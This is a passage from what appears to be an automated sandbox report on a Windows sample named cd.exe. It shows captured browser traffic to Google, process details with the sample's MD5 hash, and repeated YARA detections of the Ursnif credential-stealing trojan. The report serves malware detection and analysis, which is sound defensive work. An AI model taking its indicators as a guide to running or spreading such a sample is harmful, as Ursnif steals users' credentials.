                                                                                                                                                                      2021-09-14 14:03:24 UTC159INData Raw: 22 23 64 61 64 63 65 30 22 2c 22 23 30 30 30 22 2c 22 23 64 61 64 63 65 30 22 2c 22 23 30 30 30 22 2c 22 23 31 61 37 33 65 38 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 22 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 36 29 22 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 34 29 22 2c 22 72 67 62 61 0d 0a
                                                                                                                                                                      Data Ascii: "#dadce0","#000","#dadce0","#000","#1a73e8",false,false,false,false,false,false,true,false,false,false,false,false,"rgba(0,0,0,.12)","rgba(0,0,0,.26)","rgba(0,0,0,.54)","rgba
                                                                                                                                                                      2021-09-14 14:03:24 UTC159INData Raw: 32 32 34 31 0d 0a 28 30 2c 30 2c 30 2c 2e 38 37 29 22 2c 22 72 67 62 61 28 32 30 34 2c 32 30 34 2c 32 30 34 2c 2e 31 35 29 22 2c 22 72 67 62 61 28 32 30 34 2c 32 30 34 2c 32 30 34 2c 2e 32 35 29 22 2c 22 72 67 62 61 28 31 31 32 2c 31 31 37 2c 31 32 32 2c 2e 32 30 29 22 2c 22 72 67 62 61 28 31 31 32 2c 31 31 37 2c 31 32 32 2c 2e 34 30 29 22 2c 22 23 34 32 38 35 66 34 22 2c 22 23 31 35 35 38 64 36 22 2c 22 23 33 34 61 38 35 33 22 2c 22 23 65 61 34 33 33 35 22 2c 22 23 66 62 62 63 30 34 22 2c 22 23 66 38 66 39 66 61 22 2c 22 23 66 38 66 39 66 61 22 2c 22 23 66 38 66 39 66 61 22 2c 22 23 37 30 37 35 37 61 22 2c 22 23 32 30 32 31 32 34 22 2c 22 23 33 34 61 38 35 33 22 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 22 2c 22 23 33 32 33 32 33 32 22 2c 22 23
                                                                                                                                                                      Data Ascii: 2241(0,0,0,.87)","rgba(204,204,204,.15)","rgba(204,204,204,.25)","rgba(112,117,122,.20)","rgba(112,117,122,.40)","#4285f4","#1558d6","#34a853","#ea4335","#fbbc04","#f8f9fa","#f8f9fa","#f8f9fa","#70757a","#202124","#34a853","rgba(0,0,0,.12)","#323232","#
                                                                                                                                                                      2021-09-14 14:03:24 UTC160INData Raw: 5c 22 23 66 66 66 5c 22 2c 5c 22 23 31 61 37 33 65 38 5c 22 2c 5c 22 23 64 31 64 31 64 31 5c 22 2c 5c 22 23 66 66 66 5c 22 2c 6e 75 6c 6c 2c 31 2c 6e 75 6c 6c 2c 31 34 2c 35 30 30 2c 5c 22 23 31 39 36 37 64 32 5c 22 2c 5c 22 34 70 78 5c 22 2c 5c 22 23 31 61 37 33 65 38 5c 22 2c 5c 22 23 65 65 65 65 65 65 5c 22 5d 22 2c 6e 75 6c 6c 2c 22 25 2e 40 2e 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 5d 2c 30 2c 6e 75 6c 6c 2c 30 2c 30 5d 22 2c 22 65 6e 2d 47 42 22 2c 22 25 2e 40 2e 5c 22 31 33 70 78 5c 22 2c 5c 22 31 36 70 78 5c 22 2c 5c 22 31 31 70 78 5c 22 5d 22 2c 22 25 2e 40 2e 5c 22 31 30 70 78 5c 22 2c 31 30 2c 5c 22 31 36 70 78 5c 22 2c 31 36 5d 22 2c 22 25 2e 40 2e 5c 22 31 34 70 78 5c 22 2c 31 34 5d 22 2c 22 25 2e 40 2e 34 30 5d 22 2c 6e 75 6c 6c 2c 22 25 2e 40
                                                                                                                                                                      Data Ascii: \"#fff\",\"#1a73e8\",\"#d1d1d1\",\"#fff\",null,1,null,14,500,\"#1967d2\",\"4px\",\"#1a73e8\",\"#eeeeee\"]",null,"%.@.[null,null,1],0,null,0,0]","en-GB","%.@.\"13px\",\"16px\",\"11px\"]","%.@.\"10px\",10,\"16px\",16]","%.@.\"14px\",14]","%.@.40]",null,"%.@
                                                                                                                                                                      2021-09-14 14:03:24 UTC161INData Raw: 61 28 36 30 2c 36 34 2c 36 37 2c 30 2e 32 34 29 5c 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 31 70 78 20 73 6f 6c 69 64 20 20 23 64 61 64 63 65 30 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 5d 22 2c 22 25 2e 40 2e 5c 22 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2d 6d 65 64 69 75 6d 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2d 6d 65 64 69 75 6d 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2d 6c 69 67 68 74 2c
                                                                                                                                                                      Data Ascii: a(60,64,67,0.24)\",null,null,\"1px solid #dadce0\",\"none\",\"none\",\"none\"]","%.@.\"Google Sans,arial,sans-serif\",\"Google Sans,arial,sans-serif-medium,sans-serif\",\"arial,sans-serif\",\"arial,sans-serif-medium,sans-serif\",\"arial,sans-serif-light,
                                                                                                                                                                      2021-09-14 14:03:24 UTC163INData Raw: 6f 67 6c 65 20 53 61 6e 73 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 33 32 70 78 5c 22 2c 5c 22 32 34 70 78 5c 22 2c 6e 75 6c 6c 2c 5c 22 35 30 30 5c 22 5d 22 2c 22 25 2e 40 2e 34 5d 22 2c 22 25 2e 40 2e 5c 22 31 34 70 78 5c 22 2c 31 34 2c 5c 22 31 36 70 78 5c 22 2c 31 36 2c 5c 22 30 5c 22 2c 30 2c 5c 22 6e 6f 6e 65 5c 22 2c 36 33 32 2c 5c 22 31 70 78 20 73 6f 6c 69 64 20 23 64 66 65 31 65 35 5c 22 2c 5c 22 6e 6f 72 6d 61 6c 5c 22 2c 5c 22 6e 6f 72 6d 61 6c 5c 22 2c 5c 22 23 37 30 37 35 37 61 5c 22 2c 5c 22 31 32 70 78 5c 22 2c 5c 22 31 2e 33 34 5c 22 2c 5c 22 31 70 78 20 73 6f 6c 69 64 20 23 64 66 65 31 65 35 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 30 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 6e 6f 6e
                                                                                                                                                                      Data Ascii: ogle Sans,arial,sans-serif\",\"32px\",\"24px\",null,\"500\"]","%.@.4]","%.@.\"14px\",14,\"16px\",16,\"0\",0,\"none\",632,\"1px solid #dfe1e5\",\"normal\",\"normal\",\"#70757a\",\"12px\",\"1.34\",\"1px solid #dfe1e5\",\"none\",\"0\",\"none\",\"none\",\"non


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.6 | 49752 | 142.250.102.106 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:24 UTC | 167 | OUT | GET /images/branding/googlelogo/2x/googlelogo_color_272x92dp.png HTTP/1.1
                                                                                                                                                                      Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                      Referer: https://www.google.com/?gws_rd=ssl
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cookie: CONSENT=PENDING+509
2021-09-14 14:03:24 UTC | 168 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                      Content-Length: 13504
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Expires: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Cache-Control: private, max-age=31536000
                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      Server: sffe
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.6 | 49755 | 142.250.102.106 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:24 UTC | 182 | OUT | GET /gen_204?ei=rKtAYY2rHY25kwWZrp3YAw&vet=10ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQhJAHCBQ..s&gl=GB&pc=SEARCH_HOMEPAGE&isMobile=false HTTP/1.1
                                                                                                                                                                      Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                      Referer: https://www.google.com/?gws_rd=ssl
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cookie: CONSENT=PENDING+509
2021-09-14 14:03:24 UTC | 182 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Server: gws
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.6 | 49757 | 142.250.102.106 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:24 UTC | 183 | OUT | GET /images/searchbox/desktop_searchbox_sprites318_hr.png HTTP/1.1
                                                                                                                                                                      Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                      Referer: https://www.google.com/?gws_rd=ssl
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cookie: CONSENT=PENDING+509
2021-09-14 14:03:24 UTC | 183 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                      Content-Length: 779
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Expires: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Cache-Control: private, max-age=31536000
                                                                                                                                                                      Last-Modified: Wed, 22 Apr 2020 22:00:00 GMT
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      Server: sffe
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close


                                                                                                                                                                      Code Manipulations

                                                                                                                                                                      Statistics

                                                                                                                                                                      Behavior

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:02:47
                                                                                                                                                                      Start date:14/09/2021
                                                                                                                                                                      Path:C:\Users\user\Desktop\cd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:'C:\Users\user\Desktop\cd.exe'
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:3922432 bytes
                                                                                                                                                                      MD5 hash:CD02E745A08DD29CB6FDA1761B2F4B6E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:03:15
                                                                                                                                                                      Start date:14/09/2021
                                                                                                                                                                      Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                      Imagebase:0x7ff721e20000
                                                                                                                                                                      File size:823560 bytes
                                                                                                                                                                      MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:03:17
                                                                                                                                                                      Start date:14/09/2021
                                                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2
                                                                                                                                                                      Imagebase:0xb20000
                                                                                                                                                                      File size:822536 bytes
                                                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Code Analysis
